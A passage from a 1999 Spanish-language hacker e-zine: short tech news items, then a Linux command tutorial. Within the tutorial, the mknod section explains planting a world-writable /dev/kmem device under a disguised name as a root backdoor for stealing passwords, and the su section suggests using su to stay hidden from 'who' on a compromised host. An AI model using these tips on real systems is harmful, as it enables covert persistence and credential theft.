hara llegar a los 2,46  mil  millones  de  dolares,  comparados  con  los 686  
millones  de  la  temporada  anterior.  Incluyendo otras regiones, el mercado 
mundial de productos vinculados con la seguridad  movilizo  2,37 mil millones 
el a~o pasado.

Segun  los  analistas  de  esta  destacada  consultora  que  tiene su base en 
Londres,  el hecho de gastar en productos de seguridad y de administracion de 
personal  sera   cada   vez   mas   importante   para  aquellas  compa~ias  y 
organizaciones  que  colocan  grandes  cantidades  de  informacion  en  redes 
informaticas como Internet. 

El aumento del uso de redes esta intimamente relacionado  con el temor de que 
las  usurpaciones  no  autorizadas  y los ataques realizados por los  hackers 
continuan en alza.

"Como si el problema del Y2K -las computadoras no reconoceran los ultimos dos 
digitos 00 e interpretaran que comienza  el  a~o  1900  en lugar del 2000- no 
fuera  suficiente,  el  riesgo  que  existe  de que se produzcan  ataques  de  
cualquier angulo -internos o externos- debe ser  considerado por las empresas 
que manejen redes o tengan su propia pagina web", concluia el informe.


ESCUCHAS Y CENSURA EN INTERNET

El  parlamento  de  Japon  aprobo  la  semana  pasada una polemica ley que da 
derecho a los policias a interceptar las comunicaciones,  como pueden ser las 
llamadas telefonicas o los emails en Internet.

La justificacion se enmarca dentro de las necesidades que  los agentes tienen 
para perseguir al crimen organizado.

El gobierno insiste en que esta medida ayudara a los agentes, y que solo sera 
utilizada  en  los  casos  en los que se vean implicados asuntos  de  drogas, 
armas, asesinatos y en la entrada de grupos organizados a Japon.

Se supone que los grupos organizados utilizaran sistemas criptograficos fuera 
del alcance del gobierno, con lo  que  para  muchos los argumentos esgrimidos 
son solo una mala justificacion de cara al control  de las comunicaciones del 
ciudadano.

Mientras tanto, en Australia, Internet tambien se  encuentra  en  el  ojo del 
huracan  de  la  clase  politica. En esta ocasion, dentro de la normativa que 
rige los servicios de difusion,  se  esta  intentando implantar la censura en 
cuanto a los contenidos accesibles en la Red.

En  principio,  se quiere hacer hincapie en el  material  pornografico  y  el 
clasificado de alto  riesgo,  como  puede  ser  la construccion de bombas. El 
gobierno se escuda en que las medidas han sido fruto  de la peticion popular, 
donde los padres han ejercido mucha presion preocupados  por  los  contenidos 
nocivos que sus hijos pueden encontrar en la Red.

South China Morning Post: 
http://www.technologypost.com/internet/DAILY/19990813103941567.asp?Section=MainNews.com.au

News Australian
http://technology.news.com.au/techno/4195567.htm

VIDEOTELEFONOS MOVILES

La tercera generacion de telefonos moviles, que saldra al mercado en el 2003, 
podra gestionar hasta dos millones de bits por segundo, frente a los 9.600 de 
los actuales GSM.

Es  el  nuevo  prototipo  que  ha  presentado  Nokia  en el Cebit de Hannover 
(Alemania)  una  de  las  mas  importantes ferias europeas de  electronica  y 
tecnologia.  

En una carroceria de las mismas  dimensiones  que  los  actuales  GSM  se han 
introducido una pantalla en color de alta resolucion y una videocamara. 

Ademas  de  las  videoconferencias,  una  terminal  de  estas caracteristicas 
pemitiria  acceder  a  servicios  de  video, como los informativos  y  enviar 
imagenes en tiempo real.  

 
HUELGA DE INTERNAUTAS.ESPA~A 3 SEPTIEMBRE

Ya esta preparandose la siguiente Huelga de Internautas en Espa~a para el dia 
3 de Septiembre. Se pretende  conseguir  la  incorporacion de la Tarifa Plana 
inmediatamente en toda Espa~a, pudiendo utilizar la tecnologia ADSL y por RTB 
como medida transitoria hasta que este totalmente  implantado  por  una cuota 
mensual  no  superior a 5.000 y las llamadas locales con Tarifa Plana,  igual 
que ofrecen otras operadoras en otros paises pagando una minima cuota mensual 
no superior a 3.000 pesetas. 

Para  ello se ha  preparado  un  calendario  y  horario  de  acciones  contra 
Telefonica, asi como una web de donde bajar soft especial para hacer llamadas 
masivas a los numeros 900 (gratuitos) de informacion de dicha compa~ia.  

URL: www.telepolis.com/deluk

9-7-99 Intel  reconoce  la  existencia  de 46 errores en el microcodigo de su 
procesador Pentium III:

Problemas  de calculos y saltos que pueden provocar  cuelgues  o  ejecuciones 
incontroladas.  

Aunque segun  el  fabricante  de  estos  procesadores no deberiamos llamarlos 
fallos o bugs sino simplemente "erratas". A  pesar de los errores detectados, 
Intel no parece estar interesada en resolverlos,  pues se han calificado como 
problemas menores.

6-8-99 Autoinfectados:  El  grupo  Hacker  cult  of  the  death cow ha salido 
trasquilado  de  su ultima accion, dirigida contra las maquinas  Windows  NT. 
Intentaban utilizar  una herramienta de tipo troyano, denominada back orifice 
2000, pero se encontraron  con  que  el  CD  que  contenia el programa estaba 
infectado.

Durante  la  duplicacion  del  disco,  el  virus  penetro   en   sus  propios 
ordenadores.  Los  responsables  del grupo han declarado que se sienten  como 
idiotas.

20-8-99 Intel  parece  dispuesta  a  comprar  AMD,  su  principal  rival.  La 
adquisicion de AMD no resultaria demasiado cara para Intel, ya que desde hace 
un mes las acciones de esta ultima empresa han caido en picado y ademas en el 
ultimo  trimestre  se  detectaron  grandes perdidas. Probablemente Intel haya 
pensado en esta operacion como estrategia para impedir que el Athlon (K7 ) el 
nuevo procesador de AMD arrase en el mercado.


Segun  calculos  del  MIT,  Instituto  de  Tecnologia de Massachusetts, si se 
imprimiera toda la informacion que hay de Internet  en  papel, se llegarian a 
cubrir las 3/4 partes de la Tierra.

Ya hay 150 millones de personas conectadas, de los cuales 3  millones  son en 
Espa~a...Y se calcula que se llegara a los 400 millones en el a~o 2002.

Por  Inet, circulan unos 350 Gigabytes por segundo, lo que equivale a 300.000 
libros.

Bueno,  esto  es  todo por ahora... Si teneis noticias interesantes o quereis 
incluir alguna para el proximo ezine, escribid a TnK  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

15. _____________________________________________________________ Curso Linux
                                                                  By TeeSPy

        ****************************************************************
        *     Comandos -medianamente-  avanzados (pero muy utiles)     *
        *        y algunos archivos importantes                        *
        *           by: TeeSPy <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >                    *
        ****************************************************************

Introduccion:

Hola  a  todos,  como  esta  toda  la  comunidad  linuxera  chilena e hispano 
hablante!!!

Con  este  articulo  pretendo  comenzar  una serie de articulos  dedicados  a
Linux  ke ire aportando a la e-zine. Ojala  ke  el  tiempo  me  alcanze  para
poder hacerlo :-).

Bueno,  ya  saben,  si  no  cumplo, tienen mi mail para recordarmelo, pero si
cumplo, todos los insultos como siempre a /dev/null.

Este es uno de los primeros articulos  ke  he hecho, asi ke ya saben...

Sean  benevolentes  con  los errores. Es bien sabido ke la intencion es lo ke
cuenta!!!!

El articulo va dirigido mas  ke  nada  a  todos los usuarios principiantes de 
Linux ke estan kabriados de encontrar tantos y tantos articulos ke te ense~an 
a usar ls, cd, mkdir y todo eso (no es ke  los este criticando), sino ke creo 
ke de eso ya hay escrito bastante y es hora  de empezar con algo mas avanzado 
(e interesante). 

Hay ke darse cuanta de ke linux es mucho mas ke DOS, y esto lo digo por ke me 
muero de rabia cuando encuentro ke a los usuarios  principiantes  en Linux (o 
ke   kieren  empezar),  les  hacen  esta  comparacion...  Asi  nadie  va   ha 
entusiasmarse a instalar Linux... O es ke a alguien le agrada DOS ???  :-)

Tambien  esta  decir ke esto no pretende ser un remplazo de "man comando" (ke 
va, no hay nada  ke  pueda remplazar eso...), sino ke pretende ser una peqe~a 
rese~a para saber "a ke comandos les debo hacer un "man", y por ke".

Es por eso ke solo a  algunos comandos les voy a explicar la sintaxis. Mas ke
nada voy a decir para ke sirven, por ke son importantes y cual es su uso.

Luego de eso si kieres saber los detalles tecnicos y de sintaxis del comando, 
pues haz un "man comando",  o  si  tienes  el sistema GNU-info haces un "info 
comando"... 

Ya va siendo hora de ir actualizandose.

Bueno, ahora yendo a lo tecnico, el articulo va ha contener 2 partes:

        1) Una rese~a de los comandos mas  importantes  (por  lo  menos  a mi
           parecer, y seguramente me olvide de muchos). Claro ke aki no estan 
           incluidos ls, cd y mkdir... :-)

        2) Una pasada por  unos cuantos archivos ke puede ser util conocer, y
           otros cuantos ke se DEBEN conocer...


Parte 1: Comandos

Bueno,  aki  va  la  parte  de  los  comandos...  No  estan  en  ningun orden 
particular... O bueno si, estan en el orden en ke aparecen los directorios de 
mi variable $PATH, ke contiene los directorios en los cuales me puse a buscar 
comandos interesantes. aki se los dejo...


mknod: Este comando sirve para crear ficheros de dispositivos. Me explico:

       En  Linux existen varios tipos de ficheros, y entre estos tipos  estan
       los  de dispositivo. Estos normalmente residen en el directorio /dev y
       cumplen  la funcion de ser un "portal" entre el software y el hardware
       de la makina.  Las  aplicaciones  mandan  los  datos  ke  kieren hacer
       llegar  a  los  dispositivos  (p ej el modem) a estos ficheros,  y  el
       kernel se encarga de mandar esta info al verdadero hardware.

       Bueno, este comando no tiene mucha ciencia, la sintaxis es:

       "mknod [OPTION]... NAME TYPE [MAJOR MINOR]". Me explico otra vez:

       -OPTION  serian  la opciones del comando (--version, --help o --mode).
       Para ke explicar  las  primeras 2 opciones no???. La tercera (--mode o 
       -m) es para decir a mknod con ke permisos deben ser creados los nuevos 
       ficheros de dispositivo.
			 
       -NAME vendria siendo el  nombre  del  fichero  de  dispositivo  (p  el 
       /dev/dsp). No tiene mucha ciencia, exepto ke se debe tener cuidado por 
       ke si le das un nombre no estandar al dispositivo, las aplicaciones no 
       lo  van  ha poder encontrar, a menos ke se le haga un enlace simbolico 
       (aunke como  veremos  adelante,  a veces no conviene ponerle un nombre 
       estandar al dispositivo).
                        
       -TYPE es la parte en donde se pone el tipo de dispositivo ke es.

       Existen cuantro tipos de dispositivos:
								
               El FIFO: Bueno, FIFO significa  "First  In,  First  Out", osea
               "Primero en entrar, primero en salir". De este no tengo  mucha 
               informacion,  asi  ke tendran ke averiguar ustedes mismos.  Se 
               designa con la letra "p" a la hora de usar el comando.
                                                        
               El Block (unbuffered)  special  file:  Este  sirve  para crear
               dispositivos  de  bloque  sin buffer. No entiendo muy bien  ke
               significa esto, pero kreo ke son los dispositivos ke almacenan 
               informacion, pero no en un  buffer,  sino  ke permanentemente, 
               como los discos duros o la memoria ram.

               Este tipo se designa con la letra "b" a la hora de escribir el
               comando.

               El  Character  (buffered)  special  file:  Este  es  para  los 
               dispositivos de bloque con buffer. Nuevamente solo puedo decir 
               ke  kreo  ke  este  tipo es para los dispositivos ke tienen un 
               buffer, y en el guardan la info mientras la necesiten. 
                                                        
               Ejemplos de estos dispositivos  son la tarjeta de sonido o los 
               puertos com. Se designa con la  letra "c" o "u" (la verdad, no 
               se ke diferencia tienen, pero normalmente se usa la letra "c".

       -[MAJOR MINOR]: Este campo contiene los  major  y minor numbers. Estos 
           son unos numeritos especiales, los cuales  designan el dispositivo
           en si (MAJOR NUMBER), y el numero de dispositivo (MINOR NUMBER). 

       Un ejemplo seria: 
					 
       /etc/dev/hda,  ke  tiene MAJOR NUMBER 3, y MINOR NUMBER 0 y representa 
                al primer disco  duro IDE, y /dev/hda1, ke tiene MAYOR NUMBER 
                3, y MINOR NUMBER  1,  y  representa la primera particion del 
                primer disco IDE.

                Bueno, de estos numeritos y de lo ke significa cada uno no he 
                podido encontrar mucha info, solo se ke el MAJOR NUMBER 14 se 
                refiere a todo lo ke es sonido,  y  lo se por ke me ha tocado 
                usarlo.  Por lo demas, puedes aprender  sobre  esto  yendo al 
                directorio /dev  y  haciendo un "ls -l |more", como se vera a
                continuacion

       Cada archivo de dispositivo tiene como primer caracter en los permisos
       el tipo de dispositivo ke es  (c,  u, b, p), luego el propietario y el 
       grupo, y luego el MAJOR NUMBER y el MINOR  NUMBER,  separados  por una 
       coma.  Como  dije  antes,  con  un poco de intuicion se puede aprender 
       mucho haciendo un "ls -l |more" en "/dev".

       Bueno, si no entendiste nada de lo  anterior,  pongo  un  ejemplo y lo
       explico:

       # mknod -m 660 /dev/dsp c 14, 3

       Aki  cree  el  dispositivo  /dev/dsp, con los permisos crw-rw----, del 
       tipo caracter y con el MAJOR NUMBER  correspondiente  al  sonido  y el 
       MINOR  NUMBER  3.  La  verdad  no  se  por  ke  es el 3, pero para ese
       dispositivo (a donde se manda el sonido) a mi me funciona con el 3.

       Esto es lo ke me sale al hacer un "ls -l /dev/dsp":

       crw-rw-rw-   1 root     root      14,   3 Aug  2 19:46 /dev/dsp

       Ojo ke el MINOR NUMBER no siempre se refiere al "numero de x", donde x 
       puede ser modem o tarjeta de sonido u otra cosa. Por ejemplo, yo tengo 
       el /dev/mixer  con  el  MINOR NUMBER 1, y no es ke sea otra tarjeta de 
       sonido. Es el mezclador de la tarjeta.

       Despues de haber leido todo esto, te preguntaras... Y para ke me sirve 
       saber usar este comando, si  todas  las  distribuciones ya traen todos 
       estos dispositivos hechos ???.

       Bueno, primero ke nada, te sirve por ke  eso  de arriba no es del todo
       cierto. En la Debian ke uso yo (una version peke~isima),  no  me venia
       el  "/dev/dsp".  Segundo,  por ke para nuestros propositos hacker (ke,
       kreias ke se me habia olvidado  ke eso es lo ke kieres aprender) puede
       ser muy util.

       Por ejemplo, el fichero /dev/kmem  sirve para acceder a la memoria del
       sistema. Imagina si consigues acceder  como root y creas un fichero de
       dispositivo ubicado en /dev (no tienen por ke estar en este directorio 
       obligatoriamente todos los ficheros de  dispositivos,  pero  uno ke no 
       estuviera aki, seria demasiado sospechoso). Lo creas con:
			 
       # mknod -m 777 /dev/kmem c 1, 2
 
       Bueno,  le  das a este dispositivo el nombre "hda99", por ejemplo (hda 
       para ke el root  krea  a  simple  vista  ke  es  un  disco  duro, y no 
       sospeche).  Ahora  le das permisos de lectura y escritura a todos  los 
       usuarios. 

       Te habras creado una  backdoor, y  ahora  con  algun  programa  ke  se 
       aproveche  de  esto,  podras  hacer  varias  cosas  "divertidas", como 
       obtener las contrase~as de los usuarios o blokear el sistema. 

       Lo malo de este metodo es ke es muy facil de detectar,  ya  ke  es muy
       encontrar  permisos  para  todos  los  usuarios  en  ficheros de 
       dispositivos,  y  si  superusuario es un "poquito preventivo" se  dara 
       cuenta de esto rapidamente y tomara las medidas correspondientes.

       Bueno, el ejemplo del  /dev/kmem ke acabo de poner es solo una idea de
       lo ke se puede hacer con  este  metodo.  Puedes hacer lo mismo con los
       ficheros de dispositivo de discos duros, modems, terminales, etc.

       Obviamente, este comando lo puede usar solo  el root (a menos ke se le
       den permisos de ejecucion para todos los usuarios,  pero  no  creo  ke 
       encuentres eso en ninguna parte).


mesg: Bueno,  este  comando  se  usa  para  definir  si otros usuarios pueden 
      mandarte mensajes con write (u otro programa parecido)  o  no. Osea, si
      otros  usuarios  pueden  escribir  algo y ke esto salga en tu  terminal
      como mensaje. La sintaxis es muy simple:

      # mesg [y|n]

      Donde "y" es para permitir ke los otros  usuarios  te escriban y "n" es
      para no dejarlos hacer eso.
			
      Bueno,  lo ke este comando hace en realidad es cambiarle  los  permisos
      al fichero  de  dispositivo correspondiente a la terminal (/dev/tty(x)) 
      ke estas usando, para ke asi otros usuarios puedan escribir en esta.

      Es normal ke este por  default  en "n", debido al peligro ke representa
      tenerlo en "y". Como veras, este comando da acceso a todos los usuarios
      a tu terminal... Imagina alguien ke  sepa  aproveharse de esto... (y ke
      se de el caso, por ke no es llegar y explotar,  se  tienen ke dar otras
      condiciones, y depende del tipo de terminal de estes usando).


kill: Este otro sirve para "matar" procesos. Es muy util cuando algun proceso 
      te esta blokeando otro, como por ejemplo me pasa a mi a veces en las X. 
      En estos casos simplemente voy a otra terminal, hago un  "ps",  veo  el 
      PID  del  proceso  ke kiero matar y lo termino. Este es solo un ejemplo 
      del uso de kill. Se usa para muchas otras cosas.
			
ln: Este se usa para hacer enlaces. 
		
    Los enlaces son un elemento del sistema de archivos ke apuntan hacia otro 
    archivo, el cual si existe.  Son  muy  utiles, por ejemplo, cuando tienes 
    una  libreria  compartida  y  los  programas  buscan  esta  libreria  por 
    distintos nombres. En ese caso, haces enlaces a la libreria principal con 
    distintos nombres (los nombres con ke  es  buscada).  Nuevamente, este es 
    solo un ejemplo del uso de ln.

    Existen dos tipos de enlaces: Los "simbolic links" o enlaces simbolicos y 
    los  "hard  links"  o  enlaces  duros.  Los mas usados son los  "simbolic 
    links". Para mas info ya sabes... "[man|info] comando"


mount: Este otro sirve para montar dispositivos.  Estos  dispositivos  pueden 
    ser discos duros, cdrom's, diskettes, etc.
		
    En Linux, TODO y absolutamente todo esta bajo el directorio root ( "/" ), 
    y cuando  uno  kiere acceder a algun otro dispositivo, como los nombrados 
    arriba, se tiene ke "montar" en algun directorio. El directorio mas comun 
    es "/mnt/dispositivo",  en  donde  "dispositivo" es un directorio comun y 
    corriente, con el nombre ke tu le hayas  kerido  dar, y el cual fue usado 
    para montar algun dispositivo, por ejemplo, el cdrom. Una vez montado, tu 
    accederas  a  ese  directorio  (cd "/mnt/dispositivo") y  podras  ver  el 
    contenido del dispositivo montado  con  un "ls". Si el dispositivo acepta 
    escritura (p ej un disco duro), para escribir  en  este  no  hay  mas  ke 
    copiar  los  archivos  en  ese  directorio, o crearlos alli, o lo ke sea. 
    Normalmente, tiene permisos de ejecucion  para  todos  los usuarios, pero 
    eso  no  influye   mucho,  ya   ke  lo   ke   debe  tener  los   permisos 
    correspondientes son los archivos de dispositivo del dispositivo ke vas a 
    montar, entre otras cosas.


ps: Bueno, este programilla sirve para ver el estado de los procesos. 

    Es muy  util, ya ke sirve para ver si un proceso esta ocupando mucha CPU,
    o mucha   memoria, o para ver el PID de algun proceso ke kieras matar con
    kill.  Hace  uso  del  sistema  de  archivos  "proc",  el  cual  almacena 
    informacion  de todos los procesos. ps accede a proc para consultar sobre 
    los procesos (la  verdad  no  se  si esto es nuevo o ha sido asi siempre, 
    pero es lo estandar). 

    Tiene  muchas  opciones   y es muy potente...  Consulta  las  paginas  de
    manual o del sistema info para mas informacion.

su: Este otro sirve para permitir  a  un usuario convertirse temporalmente en 
    otro usuario. Lo ke hace en realidad, es correr algun comando pero con el 
    UID, GID, y grupos suplementarios del usario escogido, aunke normalmente, 
    este comando es una shell (en realidad  es  mas ke normalmente, la verdad 
    es  ke  yo nunca he visto ke "su" ejecute otro  comando  ke  no  sea  una 
    shell).
		
    Obviamente,  el  ke  ejecuta  su,  debe conocer el nombre de usuario y la 
    contrase~a del usuario ke kiera suplantar.

    "su" se llama asi debido a ke es un acronimo de "substitute user".

    Bueno y sobre su uso, aparte de lo  obvio (para substituir a un usuario),
    es usado por muchos programas ke necesitan  convertirse en root por algun
    motivo (claro ke estos programas necesitan saber la contrase~a del root). 
		
    Otra utilidad es ke le he encontrado, es ke si  entras  a algun sistema y 
    obtienes la contrase~a del root, en vez de entrar al root por el programa 
    login,  entras  con  "su",  y  asi cuando alguien (posiblemente  el  root 
    genuino) haga un "who", no te veras  en  la  lista,  y  solo aparecera el 
    usuario con el ke realizaste el "su".


fsck: Este programa sirve para chekear el sistema de ficheros y arreglarlo.
		
    Su nombre creo ke viene del acronimo "File System checker". Si conoces el 
    win o el DOS, se le puede comparar con el famosisimo "scandisk"  (digo se 
    le  puede  comparar  en lo ke funcionan, por ke en efectividad gana 10000 
    veces fsck).

    Tiene muchas opciones  e  interesantes,  asi  ke  ya sabes, a revisar las
    manpages o las info-pages (esto de las info-pages lo  acabo  de inventar, 
    pero sabes a ke me refiero no ???).

halt: Si  instalaste  linux  hace poco y no conoces este comando o el comando
    shutdown... Anda rezando por tu Disco Duro... :-).
		
    Es por ke este se usa para  cuando  kieres apagar el sistema. En Linux no 
    es como en DOS ke llegas y cortas la  corriente,  sino  ke  se  tiene  ke 
    cerrar  todos los programas ke estan corriendo y hacer otras tantas cosas 
    como desmontar  el  sistema de archivos antes de apagar. Esto se hace con 
    "halt". Es como el boton de "Apagar el sistema" en el Windoze.

    Este tambien lo puede usar solo el root. O ke kreias ke ibas ha entrar en 
    el server en el ke tienes una shell e ibas a apagarlo asi no mas???.

pnpdump: Bueno, este  se usa en conjunto con isapnp. Este sirve para detectar
    el hardware PnP del  sistema  y  escribir las posibles configuraciones de 
    este en la salida estandar. Hay ke  dirigir  esta  salida a algun archivo 
    para ke pueda ser editada (ya sabes:"pnpdump >isapnp.conf").


isapnp: Este se usa junto con pnpdump. Pnpdump krea el  archivo  de  posibles
    configuraciones  de  todo lo PnP en el sistema, luego editas tal  archivo 
    con algun editor de texto y luego con:
		
    isapnp nombre-archivo-creado-con-pnpdump  cargas  los dispositivos PnP de 
    tu makina. Facil no???

    Lo  unico dificil aki es saber como editar la salida  dada  por  pnpdump, 
    pero eso no lo digo por ke es distinto para cada hardware.

    En esta parte  te  tendras  ke  guiar  solo,  asi ke ya sabes: man e info 
    roolz!!!!!!!

lilo: Este es el principal y mas usado instalador de "boot records".
		
    Si  esto  te  sono  a chino,  pues  este  programa  se encarga de todo lo 
    referente  a "como  arranca mi particion de linux", y ademas  tambien  se 
    puede encargar de particiones DOS y otras. Este programa es muy flexible, 
    y  muy  usado. Por ejemplo, una  vez  compilado  un  nuevo  kernel,  pues 
    necesitas ejecutar lilo en alguna parte de la instalacion.
		
    Tambien se usa para crear discos de inicio, etc.

shutdown: Aki deberia poner "ver halt", ya ke segun lo ke yo se sirve para lo
    mismo, pero  mejor  no  me  arriesgo por ke he escuchado a gente decir lo 
    contrario. Lo ke si se es ke tiene mas  opciones,  como ke por ejemplo se 
    puede dejar programado para ke a cierta hora el sistema se apague, y para 
    avisar a los otros usuarios sobre esto.

du: Bueno, es  muy util para ver el contenido de un directorio  con  detalle,
    incluyendo  los  subdirectorios  de  este.  Se usa mas ke nada para saber 
    cuanto espacio ocupa el directorio, pero  incluyendo  los archivos en los
    subdirectorios.

find: Este es todo una joya!!!
			
    Sirve, como te podras imaginar, para buscar archivos.

    Lo ke pasa es ke es muuuuuyyy potente, ya ke soporta  muchos criterios de
    buskeda, como tama~o, sistema de archivos, nombres, permisos y todo lo ke 
    puedas imaginar. Tambien te da la opcion de ejecutar  algun  comando  con 
    los archivos encontrados en la buskeda.

 
file: Este  tambien  es muy util. Sirve para saber el tipo de contenido de un
    archivo, por ejemplo,  para  saber si es un ejecutable (y si lo es, de ke 
    tipo), si es un script de shell, si es solo simple ASCII, etc.

    La sintaxis general es:

    file [ -vbczL ] [ -f namefile ] [ -m magicfiles ] file

    Aunke con un simple "file nombrearchivo" ya funciona.


info: Este creo ke ya lo he comentado  bastante.  Se  podria  decir  ke es la
    "proxima generacion del comando man", ya ke sirve para lo mismo, pero  la 
    forma de ver la ayuda es mucho mas facil y rapida. Contiene links a otras 
    paginas  "info"  relacionadas  con el tema ke estas viendo desde la misma 
    pagina info ke estes viendo (se habra entendido esto ultimo ???).


joe: Ke??, no lo conocen???
		 
    Es un editor de textos de facil uso,  para akellos ke no les dan ganas de 
    aprender vi o emacs y kieren algo mas sencillo.
		
    Con el fue hecho este articulo!!!!!!

killall: Este es como kill, solo ke sirve para matar procesos por su nombre y 
    no por su PID. 
		
    Yo lo uso mas ke nada para matar demonios  y para matar esos programas ke 
    todavia no se por ke cuando hago un "ps" salen  como  2  o  cuatro veces, 
    siendo ke yo lo inicie solo una vez. Como me da lata andar anotando todos 
    los PID's, solo hago un  "killall process-name" y listo.

less: Sirve para vizualizar archivos de texto.

    Es uno de los vizualizadores mas potentes, y tiene muchas  opciones  como 
    por  ejemplo  ke  las  lineas en blanco consecutivas se muestren como una 
    sola (opcion -s).

    En realidad, ese es solo un ejemplo y no pongo mas por ke no domino mucho 
    este programa. Lo unico ke se es ke cuando vi la pagina de manual de less 
    me lleve una gran (y grata) sorpresa.

who: Este comando es muy util para  los  administradores  de sistemas, y para 
    los usuarios en general.

    Sirve para ver kien esta conectado en el sistema. who  tambien te dice en 
    ke  terminal  estan  conectados los usuarios, con la opcion "--count"  te
    dice cuantos usuarios estan conectados, y te da sus nombres.

    Como la mayoria de los comandos,  este tambien acepta muchas opciones mas 
    de las ke aki digo, pero como este no  es  un  articulo dise~ado como una 
    traduccion de las paginas de manual, te dejo ese trabajo a ti.

    Usa el archivo /var/run/utmp para leer  los datos de kien esta conectado, 
    pero si se le especifica otro archivo (por ejemplo /var/log/wtmp), lee de 
    ese archivo los datos.

 
last: Este  comando  es parecido a who, solo que  muestra  la  lista  de  los 
    ultimos usuarios ke  entraron  al  sistema,  y  no  solo  de los ke estan 
    actualmente dentro de el.
		
    Last muestra todo lo ke sale en el archivo "/var/log/wtmp", o  el archivo 
    designado con la opcion "-f".

    Aki voy a hacer un peque~o apartado para explikar ke son esos 2  archivos 
    ke  nombre  arriba (en el comando who y en el last), ke o si no no  va  a 
    kedar claro el uso de los comandos.
		
    El "/var/run/utmp"  guarda  un log de los usuarios ke estan conectados en 
    el sistema en el momento, osea ke  si el usuario se desconecta pues ya no 
    va ha salir en el utmp.

    Y el otro, el "/var/log/wtmp" guarda  un log cada vez ke un usuario entra 
    o sale del sistema, y mantiene ese log una vez ke el usuario se va.

    Cabe destacar ke hay sistemas (en realidad  no  se si esto ira para todos 
    los sistemas o no) en ke una vez ke el "/var/log/wtmp"  ha crecido mucho, 
    se mueve el archivo a otro auxiliar, como por ejemplo /var/log/wtmp.1,  y 
    se  empieza con un nuevo archivo, asi ke ya sabes, si de un dia para otro 
    ves ke  al  hacer  un  last  ves  solo unas pocas entradas, no te asustes 
    (aunke si vale la pena revisar si eso fue lo ke paso o no).


man: Supongo ke este lo conoces no???
		 
    Sirve para ver las paginas de manual.

    Las paginas de manual son un sistema  de  documentacion  de UNIX ke sirve
    para encontrar informacion referente a algo (normalmente un comando).

    La sintaxis mas general del comando es "man x", donde "x"  puede  ser  un
    comando, un archivo o otra cosa.

    Lo  mas general es ke todos los comandos tengan su correspondiente pagina 
    de  manual,   mas   algunos  archivos  importantes  como  /etc/crontab  o 
    /etc/printcap.


nice: Este sirve para correr  un  comando  (o  una  tarea,  o  komo le kieras 
    llamar) con su prioridad ajustada.

    La  verdad,  yo  nunca lo he usado, pero como lo escucho nombrar  siempre 
    crei que seria importante nombrarlo aki.

    El rango de prioridades  va desde el -20 (la mas alta prioridad) hasta el 
    19 (la mas baja). Se necesitan privilegios de root para dar una prioridad 
    negativa.

    Si no me ekivoco, cuando  un comando se ejecuta en un principio tiene una 
    prioridad de 10 (no estoy seguro de esto!!!!!).

    Supongo ke te imaginaras su utilidad no ???


uuencode: Este sirve para convertir  archivos  binarios  en archivos de texto
    ASCII,  ke  luego  pueden  ser  vueltos a convertir en binarios  mediante 
    uudecode.

    Sirve mucho para mandar archivos  binarios  por  algun  medio  ke  no los 
    soporte.  Como  ejemplo,  te puede decir ke los chikos del grupo Raregazz 
    mandan programas en su e-zine mediante este medio.


uudecode: Bueno, pues como arriba  dije,  este  es  para volver a convertir a
    archivos binarios los archivos de texto ASCII generados con uuencode.


wget: Este es una completisima aplicacion ke irve para  bajar  archivos de la
    World  Wide  Web.  Para  los  ke estan familiarizados con win es  como el 
    GetRight de Linux.

    Es muy potente... Puedes, por  ejemplo,  hacer  una copia exacta de algun
    sitio  de  la web, o ftp, incluyendo la estructura de  directorios.  Esto
    puede ser usado  para hacer mirrors de sitios. Tambien cabe decir ke wget 
    es no-interactivo, y  soporta "resume" (continuar en ingles). Para los ke 
    no saben lo ke es esto, les digo ke con wget uno puede empezar a bajar un 
    archivo, desconectarse y terminarlo otro dia.

adduser: Sirve para agregar un usuario al sistema.

    La sintaxis mas general es  "adduser  nombreusuario". Con esto adduser te 
    ira preguntando interactivamente los datos  del  usuario, como su nombre, 
    password,  etc.  Existe  una segunda forma de agregar el usuario,  ke  es 
    poniendo  toda  la  informacion   de   una   sola  vez,  o sea,  en  modo 
    no-interactivo. Para esto tenemos ke conocer los parametros del programa. 
    Para mi es mucho mas facil la primera forma, aunke si por ejemplo tenemos 
    un script ke necesita agregar un usuario, no  seria la idea ke preguntara 
    todas las cosas, y tendria ke usar la segunda forma.

    Es muy comun encontrar este programa con el nombre de "useradd".
    
deluser: Se usa junto con adduser, solo ke sirve para borrar usuarios.

    Tambien es comun encontrarlo con el nombre de "userdel". 

Y aki se termina la primera parte de este articulo.

De  todas  maneras te aseguro ke hay muchos mas comandos  importantes  ke  es 
necesario aprender, y ke no estan nombrados aki.


Parte 2: Archivos

Aki empieza la  segunda parte de este articulo, ke al igual ke la primera, no
va orientada a explikar la sintaxis misma de los archivos.

De echo, esta parte  va  ha  ser  mucho  mas  breve, ya ke la sintaxis de los
archivos  es  mucho  mas complicada ke la de los comandos.  Aki  solo  voy  a 
nombrar los archivos, para ke tengas alguna referencia.

En  todo  caso,  la  mayoria   de   los  archivos  aki  nombrados  tienen  su 
correspondiente  pagina  de  manual  (o  pagina-info).  Para   poder  ver  la 
informacion de cada uno de los archivos, se hace un "man|info nombrearchivo",
pero  no  se te ocurra hacer un "man|info /etc/nombrearchivo" o  alguna  cosa 
asi.


/etc/inetd.conf --> Este archivo contiene la configuracion del demonio inetd, 
    ke es  el  ke  controla  todo lo referente a los servicios de Internet ke 
    presta tu makina. (ftp, http, pop, etc.)

/etc/issue  --> Este no es demasiado  importante,  pero es divertido. De este
    archivo es de donde se lee el mensaje ke te muestra  el  programa login a 
    la hora de hacer login. Por ejemplo a mi me muestra: Debian GNU/Linux 2.1
    biodomo tty2. Le puedes poner lo ke kieras... Incluso algun ASCII art, ke
    puede  ser  tbn  a colores (esto no se komo se hace, pero la distribucion 
    Mandrake de Linux trae dibujado un lingo pinguinito en el issue).

    Ten cuidado, por ke hay algunas distribuciones en ke si cambias el issue,
    te lo vuelve a poner como el original cuande se re-ejecuta el login.


/etc/printcap  --> Este  otro  es  el  principal  componente  de  la serie de
    archivos  ke son necesarios para configurar las impresoras. Aki es  donde
    se  dice al lpd  (demonio  de  impresion)  todas  las  impresoras  ke  se 
    encuentran  disponibles,  y algunos parametros de configuracion para cada
